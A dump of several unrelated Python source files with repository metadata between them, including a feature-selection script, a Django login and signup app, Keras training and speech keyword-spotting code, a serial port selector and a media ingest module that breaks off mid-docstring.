feature_resolver = FeatureResolver (dataset)
# @var feature_file String
feature_file = feature_resolver.get_suggested_cache_file ('lf', task_type)
# @var features_cache String The file where the features are stored
features_cache = dataset.get_working_dir (args.task, feature_file)
# If the feautures are not found, get the default one
if not Path (features_cache).is_file ():
raise Exception ('features lf file are not avaiable')
sys.exit ()
# @var transformer Transformer
transformer = feature_resolver.get ('lf', cache_file = features_cache)
# @var features_df DataFrame
features_df = transformer.transform ([])
# @var linguistic_features List
linguistic_features = features_df.columns.to_list ()
# Keep only the training features
features_df = features_df[features_df.index.isin (df_train.index)].reindex (df_train.index)
# Attach label
features_df = features_df.assign (label = df_train['label'])
# @var unique_labels Series Bind to the label
unique_labels = dataset.get_available_labels ()
# @var X
X = features_df.loc[:, features_df.columns != 'label']
# @var mi
if 'classification' == task_type:
mi = mutual_info_classif (X = X, y = df_train['label']).reshape (-1, 1)
elif 'regression':
mi = mutual_info_regression (X = X, y = df_train['label']).reshape (-1, 1)
# @var best_features_indexes List
best_features_indexes = pd.DataFrame (mi,
columns = ['Coefficient'],
index = linguistic_features
)
if 'regression' == task_type:
print ("by dataset")
print ("----------")
best_features_indexes.index = linguistic_features
print ("top")
print (best_features_indexes.sort_values (by = 'Coefficient', ascending = False).head (20).to_csv (float_format = '%.5f'))
print ("worst")
print (best_features_indexes.sort_values (by = 'Coefficient', ascending = True).head (10).to_csv (float_format = '%.5f'))
if 'classification' == task_type:
# @var average_features_per_label List
average_features_per_label = [features_df.loc[df_train.loc[features_df['label'] == label].index].mean ().to_frame ().T for label in unique_labels]
# Merge features by label
features_df_merged = pd \
.concat (average_features_per_label) \
.reset_index (drop = True) \
.assign (label = unique_labels) \
.set_index ('label') \
.transpose ()
# Attach coefficient to the features
features_df_merged = features_df_merged.assign (Coefficient = best_features_indexes.values)
print ("by dataset")
print ("----------")
best_features_indexes.index = features_df_merged.index
print ("top")
print (best_features_indexes.sort_values (by = 'Coefficient', ascending = False).head (10).to_csv (float_format = '%.5f'))
print ("worst")
print (best_features_indexes.sort_values (by = 'Coefficient', ascending = True).head (10).to_csv (float_format = '%.5f'))
# Results merged by label
print ("by label")
print ("----------")
print ("top")
print (features_df_merged.sort_values (by = 'Coefficient', ascending = False).head (10)[unique_labels].to_csv (float_format = '%.5f'))
print ("worst")
print (features_df_merged.sort_values (by = 'Coefficient', ascending = True).head (10)[unique_labels].to_csv (float_format = '%.5f'))
if __name__ == "__main__":
main ()
| [
"Smolky@gmail.com"
] | Smolky@gmail.com |
9545a1c677720b2cc1d1a08ee3eaaa268a423759 | 390d19c3159133d8c688396cb11b4ed3f8178d09 | /BaekJoon/APS_2019/2669_직사각형 네개의 합집합의 면적.py | 1d2b01330c52119bf983190b61936d5a7dcf040a | [] | no_license | JJayeee/CodingPractice | adba64cbd1d030b13a877f0b2e5ccc1269cb2e11 | 60f8dce48c04850b9b265a9a31f49eb6d9fc13c8 | refs/heads/master | 2021-08-16T17:14:01.161390 | 2021-07-16T00:42:18 | 2021-07-16T00:42:18 | 226,757,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py |
dwr = [[0]*100 for _ in range(100)]
count = 0
for i in range(4):
xs, ys, xe, ye = map(int, input().split())
for x in range(xs, xe):
for y in range(ys, ye):
if dwr[x][y] == 0:
dwr[x][y] = 1
count += 1
print(count)
| [
"jay.hyundong@gmail.com"
] | jay.hyundong@gmail.com |
0d2a16d7181c1db586115e68bf2682e3051a7bef | e9bc2f88c0849c7a00d7f6a443d23e9148b0fe4e | /hc05config/port_select.py | 3f839191157c5f7505ab32ae4d280b0163169006 | [
"MIT"
] | permissive | DenisSouth/HC-05-ConfigTool | 03908031eee02f123708ff25508b7dcd0707bc73 | fb03e8057a2bdb88dcfc793889d76781d04dfeb7 | refs/heads/master | 2021-05-17T14:30:16.804628 | 2020-03-28T15:27:57 | 2020-03-28T15:27:57 | 250,822,752 | 0 | 0 | MIT | 2020-03-28T15:00:00 | 2020-03-28T14:59:59 | null | UTF-8 | Python | false | false | 900 | py | from serial.tools.list_ports import comports as listPorts
from serial.serialutil import SerialException
from .AT_command import *
from .input_lib import get_input
def getPortName(info_msg):
while True:
print("Available Ports:")
ports = list(map(lambda x: x.device, listPorts()))
for i, port in enumerate(ports):
print("{}: {}".format(i + 1, port))
print("{}: Rescan serial port\n".format(i + 2))
selection = get_input(int, info_msg, "The input is invalid, please enter again", range(1, len(ports) + 2)) - 1
if selection in range(len(ports)):
return ports[selection]
print()
def getPort(info_msg):
while True:
port_name = getPortName(info_msg)
try:
return SerialATMode(port_name, 38400, timeout=0.5, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE)
except SerialException:
print("\"{}\" is currently busy, please select other port\n".format(port_name))
| [
"josephlamyip@gmail.com"
] | josephlamyip@gmail.com |
8d78ceb59cff063599be6331c747a3e13bbbd508 | 19edbb9d8e48fe0e3f610a9964c65b63a8657c6e | /kerasNet.py | 30d2a627fdb46e1acc456e99a2f6a422abf35368 | [] | no_license | iaakhter/sensorimotorProject | 73c94b757c07b5005a16148c8606b02704da0a97 | 2d9efe3826d12fff1414815985549a48f081daac | refs/heads/master | 2021-01-11T06:38:07.626131 | 2017-04-18T17:45:57 | 2017-04-18T17:45:57 | 81,383,967 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,552 | py | from keras.utils import np_utils
from keras.models import Sequential
from keras.models import load_model
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
import processImages
import numpy as np
class kerasNet:
def __init__(self):
self.imagePath ="trainingData/trainingFeatureXY.txt"
self.labelPath = "trainingData/trainingLabelXY.txt"
self.numOfExamples = self.getNumberOfTrainingExamples()
self.numOfFeatures = 4
self.numOfLabels = 2
def train(self):
print "Training keras with ", self.numOfExamples, " examples "
xTrain = processImages.constructXFromTargetFocusLocations(self.numOfExamples, self.numOfFeatures, self.imagePath)
yTrain = processImages.convertLabelToArray(self.numOfExamples, self.numOfLabels, self.labelPath)
self.model = Sequential()
self.model.add(Dense(10, input_shape=(4,), activation='relu', use_bias=True))
# self.model.add(Dropout(0.8))
# self.model.add(Dense(5, activation='relu'))
# self.model.add(Dropout(0.8))
# self.model.add(Dense(64, activation='relu'))
self.model.add(Dense(2))
self.model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mse'])
history = self.model.fit(xTrain, yTrain,
batch_size=128,
epochs=1000,
verbose=0,
validation_split=0.8)
score = self.model.evaluate(xTrain, yTrain, verbose=0)
print('Test accuracy:', score[1])
self.model.save('myKerasNet.h5')
def predict(self, xTest):
xTest = np.reshape(xTest, (1,4))
yhat = self.model.predict(xTest)
return yhat
def getNumberOfTrainingExamples(self):
f = open(self.labelPath, 'r')
line = f.readline()
numExamples = 0
while line:
numExamples += 1
line = f.readline()
f.close()
return numExamples
if __name__ == "__main__":
model = kerasNet()
model.train()
Xtest = processImages.constructXFromTargetFocusLocations(10, 4, "testData/testingFeatureXY.txt")
ytest = processImages.convertLabelToArray(10, 2, "testData/testingLabelXY.txt")
# Xtest = np.reshape(Xtest, (10,4))
for i in range(len(Xtest)):
prediction = model.predict(Xtest[i,:])
print "prediction: ", prediction
print "true value: ", ytest[i,:]
| [
"ariadna.estrada42@gmail.com"
] | ariadna.estrada42@gmail.com |
22e1a1b713c1d6e6b129ad2751ba27359fa8d981 | 0b5400b2c9ace176ce8f3d21e4a4a19808b4de63 | /restaurant/models.py | ed5400cfe7eec52462b544f0f9ecd6a9b2dcb37b | [
"MIT"
] | permissive | turgayh/Recipe-Share | 771a5b0ef9ebd9b65b2d3d6b807bcc7d8d59a00b | 858eb3e0e21c11b62249fbc9490cd7bb1f244b9e | refs/heads/master | 2020-12-15T14:35:12.613063 | 2020-02-03T15:04:16 | 2020-02-03T15:04:16 | 235,137,994 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | from django.db import models
from django.contrib.auth.models import User
from taggit.managers import TaggableManager
STATUS = (
(0, "Draft"),
(1, "Publish")
)
class Recipe(models.Model):
title = models.CharField(max_length=200, unique=True)
slug = models.SlugField(max_length=200, unique=True)
author = models.ForeignKey(
User, on_delete=models.CASCADE, related_name='recipe_posts')
updated_on = models.DateTimeField(auto_now=True)
content = models.TextField()
created_on = models.DateTimeField(auto_now_add=True)
status = models.IntegerField(choices=STATUS, default=0)
cover = models.ImageField(upload_to='images/', default="")
objects = models.Manager()
class Meta:
ordering = ['-created_on']
def __str__(self):
return self.title
| [
"turgayh@itu.edu.tr"
] | turgayh@itu.edu.tr |
16a037ed183da42d1408b56c0feeecf330f98bdc | c4aa7158cc93788045e244ee94b3931d15feb2cd | /src/todo_app/urls.py | 67bef8c44ac8eb7cbb5719c72b14d17b92ebb5c5 | [] | no_license | sahinmurat/django-todo | 06b91acfcdd44d23d802945f21d07daa993f3e6f | 4b240105473312e3ad42f38c9aec0e935aee8017 | refs/heads/main | 2023-03-15T13:36:55.533285 | 2021-03-15T19:40:55 | 2021-03-15T19:40:55 | 324,801,047 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | from django.urls import path
from .views import home, todo_create, todo_update, todo_delete,list
urlpatterns = [
path('', home, name = 'home'),
path('list/', list, name = 'list'),
path('create/',todo_create, name = 'create'),
path('<int:id>/delete/',todo_delete, name = 'delete'),
path('<int:id>/update/', todo_update, name = 'update'),
]
| [
"yazilimogren1111@gmail.com"
] | yazilimogren1111@gmail.com |
7d26a06ea15228d68269d68c0c454fd6b9324417 | b2a8c6cbb599959268de7d8936ab016cef981f74 | /server/keyword_spotting_service.py | f14be32414f7949ff5b7ba59bc2d82a7e34e3519 | [] | no_license | weimingtom/Speech-Recognition_mod | 56235e460b40d5faacf2c6af7a8c73fed912fdc3 | ef5304639ff0c52ec4d7a37db240c585d0aede71 | refs/heads/master | 2023-02-13T22:09:52.061788 | 2021-01-09T12:14:02 | 2021-01-09T12:14:02 | 318,730,932 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,833 | py | import librosa
import tensorflow as tf
import numpy as np
import json
import sys
SAVED_MODEL_PATH = "model.h5"
SAMPLES_TO_CONSIDER = 22050
LABEL_DATA_PATH = "label_data.json"
WAV_PATH = "tests/left.wav"
class _Keyword_Spotting_Service:
model = None
_mapping = {}
_instance = None
def __init__(self):
self.load_label_data()
def load_label_data(self):
with open(LABEL_DATA_PATH, "r") as fp:
data = json.load(fp)
labels = data["labels"]
words = data["words"]
for index in range(len(labels)):
# print("labels[index] == ", labels[index])
self._mapping[labels[index]] = words[index]
for i in range(labels[index]):
if i not in self._mapping.keys():
self._mapping[i] = "N/A"
print("[load_label_data] _mapping == ", self._mapping)
def predict(self, file_path):
# extract MFCC
MFCCs = self.preprocess(file_path)
# we need a 4-dim array to feed to the model for prediction: (# samples, # time steps, # coefficients, 1)
MFCCs = MFCCs[np.newaxis, ..., np.newaxis]
# get the predicted label
predictions = self.model.predict(MFCCs)
predicted_index = np.argmax(predictions)
predicted_keyword = self._mapping[predicted_index]
return predicted_keyword
def preprocess(self, file_path, num_mfcc=13, n_fft=2048, hop_length=512):
# load audio file
signal, sample_rate = librosa.load(file_path)
if len(signal) >= SAMPLES_TO_CONSIDER:
# ensure consistency of the length of the signal
signal = signal[:SAMPLES_TO_CONSIDER]
# extract MFCCs
MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc=num_mfcc, n_fft=n_fft,
hop_length=hop_length)
return MFCCs.T
def Keyword_Spotting_Service():
# ensure an instance is created only the first time the factory function is called
if _Keyword_Spotting_Service._instance is None:
_Keyword_Spotting_Service._instance = _Keyword_Spotting_Service()
_Keyword_Spotting_Service.model = tf.keras.models.load_model(SAVED_MODEL_PATH)
return _Keyword_Spotting_Service._instance
if __name__ == "__main__":
# create 2 instances of the keyword spotting service
kss = Keyword_Spotting_Service()
kss1 = Keyword_Spotting_Service()
# check that different instances of the keyword spotting service point back to the same object (singleton)
assert kss is kss1
print("----- keyword_spotting_service ------")
# make a prediction
if len(sys.argv) >= 2:
WAV_PATH = sys.argv[1]
keyword = kss.predict(WAV_PATH)
print("[keyword_spotting_service] WAV_PATH: ", WAV_PATH, ", predict result: ", keyword)
| [
"weimingtom@qq.com"
] | weimingtom@qq.com |
e7f1c2f893c077d760fbd104757e79d77cfb0164 | 05180b33f7d81fc90d2e72a319d4f8c1c52fb9ca | /classification/compare_models.py | aec56ee812836868d55769e65a66d02f733da453 | [
"MIT"
] | permissive | reber199/denn-ijcai | 14273fe06b9976f84a069790f50009444f665919 | 6431f699b7d9b4e4fbb9ca71f41dbdecfd34378c | refs/heads/master | 2022-09-20T16:36:00.098713 | 2020-06-04T21:22:29 | 2020-06-04T21:22:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,843 | py | '''
This files creates a csv comparing all the models in a given folder.
'''
import h5py
import matplotlib
# matplotlib.use('tkagg')
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(font_scale=1.9, rc={'text.usetex': True})
sns.set_style('whitegrid')
import pandas as pd
from tqdm import tqdm
import argparse as ap
import numpy as np
import tools
import json
from pathlib import Path
import os
import stats
# Creating the parser to use parameters
parser = ap.ArgumentParser()
parser.add_argument('--folder', type=str, required=True, help='Folders to consider when creating the figures')
parser.add_argument('--prefix', type=str, help='prefix to use for folders', required=True)
parser.add_argument('--test', type=str, default='mnist')
parser.add_argument('--entropy_evaluation', type=str, default='notmnist')
parser.add_argument('--n_nets', default=[10], nargs='+', required=False)
parser.add_argument('--save', action='store_true')
args = parser.parse_args()
def work(p, dirname, args):
r'''
Here we want to compute the entropies and KL divergences for all experiments, wrt the baseline
'''
with h5py.File(p / 'stats/{}.h5'.format(args.test), 'r') as fd:
entro_test_experiment_vals = fd.get('std')[:]
with h5py.File(p / 'stats/{}.h5'.format(args.entropy_evaluation), 'r') as fd:
entro_evaluation_experiment_vals = fd.get('std')[:]
# We compute the mean entropy on the test and evaluation datasets for our experiment
mean_entro_experiment_test = np.mean(entro_test_experiment_vals)
mean_entro_experiment_evaluation = np.mean(entro_evaluation_experiment_vals)
# Now we compute the standard deviation of the entropy on the test and evaluation datsets for our experiment
std_entro_experiment_test = np.std(entro_test_experiment_vals)
std_entro_experiment_evaluation = np.std(entro_evaluation_experiment_vals)
# Return the values
return np.array([[mean_entro_experiment_test, std_entro_experiment_test, mean_entro_experiment_evaluation, std_entro_experiment_evaluation]])
# ===============================================================================
# Going through the files and creating the figures
# ===============================================================================
# loop over all folders and if there is no std.h5 file we create it
folder = Path(args.folder)
filenames = []
results = np.empty(shape=(0,4))
for dirname in tqdm(os.listdir(folder)):
if os.path.isdir(folder / dirname):
if dirname[:len(args.prefix)] == args.prefix:
result = work(folder / dirname, dirname, args)
results = np.concatenate((results, result), axis=0)
filenames.append(dirname)
# Finally we save a csv file
df = pd.DataFrame(results, index=filenames)
df.to_csv(folder / 'stats_{}.csv'.format(args.prefix))
| [
"maximewabartha@gmail.com"
] | maximewabartha@gmail.com |
7ed367d4fe93f317195ea73b4925dcb5f4c4e690 | c14d795c9ce456d169c6d99119d68eb8bc7fc11b | /HelloWorlds/download_webpage.py | 019d70fc9a286f31cfa6750c4d70c2b206c93176 | [] | no_license | BingW/MyDoc | 706c93381377f7d766e7332d13be3dfd410bbbfe | 97d8031d32822396bd6b1bef6f846c6969a75fc6 | refs/heads/master | 2020-05-18T12:37:11.420959 | 2012-04-25T17:04:30 | 2012-04-25T17:04:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,103 | py | import mechanize
from time import sleep
#Make a Browser (think of this as chrome or firefox etc)
br = mechanize.Browser()
#visit http://stockrt.github.com/p/emulating-a-browser-in-python-with-mechanize/
#for more ways to set up your br browser object e.g. so it look like mozilla
#and if you need to fill out forms with passwords.
# Open your site
br.open('http://pypi.python.org/pypi/xlwt')
f=open("source.html","w")
f.write(br.response().read()) #can be helpful for debugging maybe
filetypes=[".zip",".exe",".tar.gz"] #you will need to do some kind of pattern matching on your files
myfiles=[]
for l in br.links(): #you can also iterate through br.forms() to print forms on the page!
for t in filetypes:
if l.url.endswith(t):
myfiles.append(l)
def downloadlink(l):
f=open(l.text,"w") #perhaps you should open in a better way & ensure that file doesn't already exist.
br.click_link(l)
f.write(br.response().read())
print l.text," has been downloaded"
#br.back()
for l in myfiles:
sleep(1) #throttle so you dont hammer the site
downloadlink(l)
| [
"toaya.kase@gmail.com"
] | toaya.kase@gmail.com |
b353b707cacb15d728f60c135063e4f6b488eee8 | 5c3ecd6974ebd714c42869081313614ba4f602a7 | /projects/exercises/empty_screen/empty_screen.py | 620dbe9556d9f61f3806280d4a7639152471a304 | [] | no_license | iloverugs/pcc_2e_student | fd491cb4d3c0546718554073a98386d8d7a499ec | 1c3ad17467c3d8deea9f3566b5eb66cbc6358a6d | refs/heads/main | 2023-04-13T01:17:21.164991 | 2021-04-23T01:09:23 | 2021-04-23T01:09:23 | 354,342,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | import sys
import pygame
class EmptyScreen:
"""Uses pygame to create an empty screen, and detects KEY_DOWN."""
def __init__(self):
"""Initialize the game, and create game resources."""
pygame.init()
self.screen = pygame.display.set_mode((1200, 800))
pygame.display.set_caption("Empty Screen")
def run_game(self):
"""Start the main loop for the game."""
while True:
self._check_events()
pygame.display.flip()
def _check_events(self):
"""Respond to keypress events."""
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
print(event.key)
if __name__ == '__main__':
# Make a game instance, and run the game.
es = EmptyScreen()
es.run_game()
| [
"81831508+iloverugs@users.noreply.github.com"
] | 81831508+iloverugs@users.noreply.github.com |
6fb2c6f9c833dee21c52f53524de44a2639ac6c3 | 9f2b8f38b31f3b7e234bd5d4868c6e6bf134f5be | /custom_auth/views.py | 8bd70469476b25adcc14ef370ff6002dd1e2497e | [] | no_license | a-pompom/Django_login | 436b4d94b396f6eb24deb470306ddbf6d0ac7e96 | 125288e754cf44b0aeba33bc792d17c7d695ef8a | refs/heads/master | 2022-12-26T10:32:32.974480 | 2020-07-31T11:27:04 | 2020-07-31T11:27:04 | 277,287,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,317 | py | from custom_auth.exceptions import LoginFailureException
from django.shortcuts import render, redirect
from django.views import View
from django.contrib.auth import login, logout
from django.contrib.auth.hashers import make_password
from django.conf import settings
from django.http import HttpRequest, HttpResponse
from typing import cast
from .forms import LoginForm, SignUpForm
from .backend import AuthBackend
from .models import User
class LoginView(View):
""" ログイン画面用View
"""
def get(self, request: HttpRequest) -> HttpResponse:
""" ログイン画面表示処理
Parameters
----------
request: HttpRequest
GETリクエスト情報
Returns
-------
response: HttpResponse
ログイン画面表示用レスポンス
"""
context = {
'form': LoginForm()
}
return render(request, 'login/login.html', context)
def post(self, request: HttpRequest) -> HttpResponse:
""" ログイン処理
Parameters
----------
request : HttpRequest
POSTリクエスト情報
Returns
-------
HttpResponse
ログイン失敗 -> ログイン画面
ログイン成功 -> トップ画面
Raises
------
LoginFailureException
ユーザ名・パスワードがDBに存在するものと合致しなかった場合に送出 ログイン画面へ再遷移
"""
form = LoginForm(request.POST)
# ユーザ認証
try:
if not form.is_valid():
raise LoginFailureException()
user = AuthBackend().authenticate(
request,
username=form.cleaned_data['username'],
password=form.cleaned_data['password']
)
# ログイン失敗
except LoginFailureException:
form.add_error(None, 'ユーザ名またはパスワードが間違っています。')
context = {'form': form}
return render(request, 'login/login.html', context)
login(request, user, 'custom_auth.backend.AuthBackend')
return redirect(settings.LOGIN_SUCCESS_URL)
class SignUpView(View):
""" ユーザ登録処理用View
"""
def get(self, request: HttpRequest) -> HttpResponse:
""" ユーザ登録画面表示
Parameters
----------
request : HttpRequest
GETリクエスト情報
Returns
-------
HttpResponse
ユーザ登録画面
"""
context = {
'form': SignUpForm()
}
return render(request, 'signup/signup.html', context)
def post(self, request: HttpRequest) -> HttpResponse:
""" ユーザ登録処理
Parameters
----------
request : HttpRequest
POSTリクエスト情報
Returns
-------
HttpResponse
ユーザ登録失敗 -> ユーザ登録画面
ユーザ登録成功 -> ログイン画面
"""
form = SignUpForm(request.POST)
# 登録失敗
if not form.is_valid():
context = {
'form': form
}
return render(request, 'signup/signup.html', context)
# ユーザ登録
user = User(
username=form.cleaned_data['username'],
password=make_password(form.cleaned_data['password']),
is_admin=False,
)
user.save()
return redirect('login:login')
class TopView(View):
""" トップ画面用View
"""
def get(self, request: HttpRequest) -> HttpResponse:
""" トップ画面表示
Parameters
----------
request : HttpRequest
GETリクエスト
Returns
-------
HttpResponse
未ログイン -> ログイン画面
ログイン済み -> トップ画面 権限に応じて出しわけ
"""
user = cast(User, request.user)
# 認証済みか
if not user.is_authenticated:
return redirect('login:login')
# 管理者か
if user.is_admin:
return render(request, 'top/top_admin.html')
return render(request, 'top/top.html')
class LogoutView(View):
""" ログアウト処理用View
"""
def get(self, request: HttpRequest) -> HttpResponse:
""" ログアウト処理
Parameters
----------
request : HttpRequest
GETリクエスト
Returns
-------
HttpResponse
ログイン画面
"""
logout(request)
return redirect('login:login')
def handler404(request: HttpRequest, exception: Exception) -> HttpResponse:
""" 404ページを表示
Parameters
----------
request : HttpRequest
存在しない画面へのリクエスト
exception : Exception
遷移元の例外
Returns
-------
HttpResponse
404ページ
"""
return render(request, 'widget_404.html', status=404)
| [
"aoi.matsuda.3x@gmail.com"
] | aoi.matsuda.3x@gmail.com |
173ca58a434c334f2487c1bf0d994d3395abcd30 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_11371.py | a3211135d7b87d8da37dd74f4338428a4d5ef5ce | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47 | py | # Using python modules over Paramiko (SSH)
RMI
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
175900569e6f72b7a15b759386df0ac40461cd79 | 6edefe5706053a775b56a53460133240dc0c78a2 | /intro-code/robustos.py | 3d72098c38f82d4177262d9009646be5fc91fe3e | [] | no_license | jjconti/charla-intro-python | 0ff6ff705db9336a4666f45bf2dac9105cc6a16d | 1c800b7c17a994f283f8c587034e21b5079a028b | refs/heads/master | 2020-04-12T07:30:24.365128 | 2016-09-17T02:45:44 | 2016-09-17T02:45:44 | 58,327,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | import random
def juego(n):
secreto = random.choice(range(n * 10))
intentos = []
intento = -1
while intento != secreto:
try:
intento = int(input('Adiviná: '))
except:
continue
intentos.append(intento)
if intento > secreto:
print('Más chico!')
else:
print('Más grande!')
print('Adivinaste!')
print('Intentos: {0}'.format(intentos))
try:
nivel = int(input('Nivel: '))
except:
nivel = 1
juego(nivel)
| [
"jjconti@gmail.com"
] | jjconti@gmail.com |
d0811e579f131e6ae78105539cd53d0ed54e3032 | 52afc11e1eb37a486a4e3a87b458cfe5ff72b8c9 | /data_prep/convert_json_via_tusimple.py | b1591a8a21ca818177d28051339ddc2c68743758 | [] | no_license | maftuhm/LaneNet | f000383430d30eb30e9b0ffb4f2b91ddfde98d5e | 0436b2992893e80d33651652637bc34954f4bac8 | refs/heads/master | 2023-01-07T04:28:43.893469 | 2020-10-27T03:59:47 | 2020-10-27T03:59:47 | 295,589,057 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,043 | py | import argparse
import json
import os
import glob
import numpy as np
import time
import cv2
from tqdm import tqdm
from matplotlib import pyplot as plt
class CreateLane:
def __init__(self, lane):
self.lane = lane
def clear(self, lane):
lane = set(lane)
self.lane = list(lane)
return self.lane
def sort(self, lane):
self.lane = sorted(lane, key = lambda y: y[1])
return self.lane
def interpolate(self, lane):
lane = self.clear(lane)
lane = self.sort(lane)
new_lane = []
for i in range(len(lane) - 1):
difx = abs(lane[i][0] - lane[i+1][0])
dify = abs(lane[i][1] - lane[i+1][1])
if difx > dify:
dif = difx
else:
dif = dify
x = np.linspace(lane[i][0], lane[i+1][0], dif, dtype = np.int32)
y = np.linspace(lane[i][1], lane[i+1][1], dif, dtype = np.int32)
new_lane.extend(list(zip(x.tolist(), y.tolist())))
lane = new_lane
lane = self.clear(lane)
lane = self.sort(lane)
return lane
def clear_ypoint(self, lane):
points = []
for i, point in enumerate(lane[:-1]):
if lane[i][1] != lane[i+1][1]:
points.append(point)
points.append(lane[-1])
self.lane = points
return self.lane
def clear_step(self, lane, point = 'y', size = (1920, 1080), step = 10):
if point == 'y':
param = size[1]
else:
return False
self.lane = [(x, y) for (x, y) in lane if y in range(0, param, step)]
return self.lane
def clear_duplicate(self, lane, point = 'y'):
points = []
for i, point in enumerate(lane[:-1]):
if lane[i][1] != lane[i+1][1]:
points.append(point)
points.append(lane[-1])
self.lane = points
return self.lane
def get(self):
self.interpolate(self.lane)
self.clear_step(self.lane)
self.clear_duplicate(self.lane)
return self.lane
def get_split(self):
lane = self.get()
x, y = [a[0] for a in lane], [a[1] for a in lane]
return x, y
class DictLanes(CreateLane):
dict_lanes = dict()
def __init__(self, lanes, index = 0):
super(CreateLane, self).__init__()
self.lanes = lanes
self.lane = lanes[index]
def min_max(self, lanes, point = 'y', size = (1920, 1080), step = 10):
width, height = 1920, 1080
min_y = [l[0][1] for l in lanes]
max_y = [l[len(l)-1][1] for l in lanes]
min_y, max_y = min(min_y), max(max_y)
return (min_y, max_y)
def get_lanes(self):
new_lanes = []
for lane in self.lanes:
new_lane = CreateLane(lane).get()
new_lanes.append(new_lane)
self.lanes = new_lanes
return self.lanes
def get(self):
lanes = self.get_lanes()
min_y, max_y = self.min_max(lanes)
h_samples = list(range(min_y, max_y + 1, 10))
new_lanes = []
for lane in lanes:
new_lane = []
i = 0
for h in h_samples:
if h in [l[1] for l in lane]:
new_lane.append(lane[i][0])
i += 1
else:
new_lane.append(-2)
new_lanes.append(new_lane)
self.dict_lanes['lanes'] = new_lanes
self.dict_lanes['h_samples'] = h_samples
return self.dict_lanes
class JsonLanes:
def __init__(self, src_dir):
self.src_dir = src_dir
def get(self):
with open(self.src_dir) as f:
json_file = json.load(f)
data_lanes = []
for index in json_file:
data = {}
regions = json_file[index]['regions']
filename = json_file[index]['filename']
lanes = []
if len(regions) == 0:
print("Image " + filename + " is not anotated.")
print(json_file[index])
break
else:
for lane in regions:
x = lane['shape_attributes']['all_points_x']
y = lane['shape_attributes']['all_points_y']
lane = [(a, b) for (a, b) in zip(x, y)]
lanes.append(lane)
dict_lanes = DictLanes(lanes).get()
data['lanes'] = dict_lanes['lanes']
data['h_samples'] = dict_lanes['h_samples']
data['raw_file'] = 'clips/' + filename.split('.')[0] + '/20.jpg'
data_lanes.append(data)
return data_lanes
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--json_path", type=str)
parser.add_argument("--save_samples", type=bool, default=False)
args = parser.parse_args()
return args
def main():
args = parse_args()
json_path = args.json_path
image_path = '/'.join(os.path.split(json_path)[:-1])
DATA = JsonLanes(args.json_path).get()
with open(image_path + '/label_lanenet_' + time.strftime('%d%m%Y_%H%M', time.localtime()) + '.json', 'w') as json_file:
for line in DATA:
json_file.write(json.dumps(line) + '\n')
if args.save_samples:
samples_dir = image_path + '/samples'
os.makedirs(samples_dir, exist_ok=True)
for image_label in tqdm(DATA):
gt_lanes = image_label['lanes']
y_samples = image_label['h_samples']
raw_file = image_label['raw_file']
lanes_vis = [[(x, y) for (x, y) in zip(lane, y_samples) if x >= 0] for lane in gt_lanes]
img_raw = raw_file.split('/')[-2]
img = plt.imread(image_path + '/' + raw_file)
for lane in lanes_vis:
for pt in lane:
cv2.circle(img, pt, radius=5, color=(0, 255, 0), thickness=-1)
plt.imsave(samples_dir + '/' + img_raw +'.jpg', img)
if __name__ == '__main__':
main() | [
"maftuh.mashuri16@mhs.uinjkt.ac.id"
] | maftuh.mashuri16@mhs.uinjkt.ac.id |
36656deb12946ccaefb8ff140cb35080590a0bce | 7f92a710bc893a6dfc3cf69525368106caae24d9 | /leetcode/length of last word.py | c6cb52aba6f9ace7b4ff8683cfd8cc683e71e668 | [] | no_license | hi-august/pyexercises | a64e45412a741aa1a883008d8c39e7664d468551 | 94a731fc517682013e96bbccd69efe90728eb788 | refs/heads/master | 2021-10-22T07:11:57.899710 | 2019-03-09T02:48:12 | 2019-03-09T02:48:12 | 22,276,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | # coding=utf-8
'''
Given s = "Hello World",
return 5.
'''
def lengthOfLastWord(s):
return len(s.strip().split()[-1])
if __name__ == '__main__':
s = "Hello World"
print lengthOfLastWord(s)
| [
"1927064778@qq.com"
] | 1927064778@qq.com |
b6cecd2502f9b14292173ff0007097c27af1b3aa | 9acdaacc569720b745d4f8b06c4181a8fe3f0590 | /build/lib/mediastruct/ingest.py | 7ede3b150facfbe98fa8bd9ca54eff5b51bac54e | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | joeljohnston/mediastruct | bbb2861715863aeaee3012dbd6da9638ec662198 | 5c7937450edebe6047198afa799e664b344cd2fe | refs/heads/master | 2023-01-22T12:53:07.230458 | 2023-01-05T12:45:39 | 2023-01-05T12:45:39 | 146,010,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,790 | py | import os
import sys
import time
import shutil
import logging
from glob import glob
log = logging.getLogger(__name__)
log.info('Ingest - Launching the Ingest Class')
class ingest(object):
'''the ingest class manages contents entering the workflow by organizing files by their last modified date
